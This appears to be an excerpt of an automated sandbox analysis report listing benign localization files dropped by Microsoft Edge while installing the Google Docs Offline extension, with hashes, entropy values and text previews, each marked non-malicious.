                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\sk\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):934
                                Entropy (8bit):4.882122893545996
                                Encrypted:false
                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\sl\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):963
                                Entropy (8bit):4.6041913416245
                                Encrypted:false
                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\sr\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):4.569671329405572
                                Encrypted:false
                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                MD5:7F5F8933D2D078618496C67526A2B066
                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\sv\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):884
                                Entropy (8bit):4.627108704340797
                                Encrypted:false
                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\sw\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):980
                                Entropy (8bit):4.50673686618174
                                Encrypted:false
                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                MD5:D0579209686889E079D87C23817EDDD5
                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ta\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1941
                                Entropy (8bit):4.132139619026436
                                Encrypted:false
                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\te\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1969
                                Entropy (8bit):4.327258153043599
                                Encrypted:false
                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\th\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1674
                                Entropy (8bit):4.343724179386811
                                Encrypted:false
                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\tr\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1063
                                Entropy (8bit):4.853399816115876
                                Encrypted:false
                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\uk\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1333
                                Entropy (8bit):4.686760246306605
                                Encrypted:false
                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                MD5:970963C25C2CEF16BB6F60952E103105
                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ur\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1263
                                Entropy (8bit):4.861856182762435
                                Encrypted:false
                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                MD5:8B4DF6A9281333341C939C244DDB7648
                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\vi\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1074
                                Entropy (8bit):5.062722522759407
                                Encrypted:false
                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\zh_CN\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):879
                                Entropy (8bit):5.7905809868505544
                                Encrypted:false
                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\zh_HK\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1205
                                Entropy (8bit):4.50367724745418
                                Encrypted:false
                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                Malicious:false
                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\zh_TW\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):843
                                Entropy (8bit):5.76581227215314
                                Encrypted:false
                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\zu\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):912
                                Entropy (8bit):4.65963951143349
                                Encrypted:false
                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                Malicious:false
                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_metadata\verified_contents.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):11024
                                Entropy (8bit):5.7535502654223265
                                Encrypted:false
                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsN9Jtwg1MK8HNnswuHEIIMuuqd7CKqvkNLYI2:m8IGIEu8RcU
                                MD5:B74774A76E2EBA7E7D1BC9084F2DDFD8
                                SHA1:A054D55F8F69BD4728266EE889DC6002139A84C6
                                SHA-256:2ED862A6E79666081F78A83BA3E39DF823D329D329ACF35B1F19E87E90B9D088
                                SHA-512:2D5E58B9533CB498A808B3FDB43A10108FB96F2F3B959561FE859926C9152A3866911C9463C52C486A0031B39881BE332529A4861BDD247F1277BF06D809D46F
                                Malicious:false
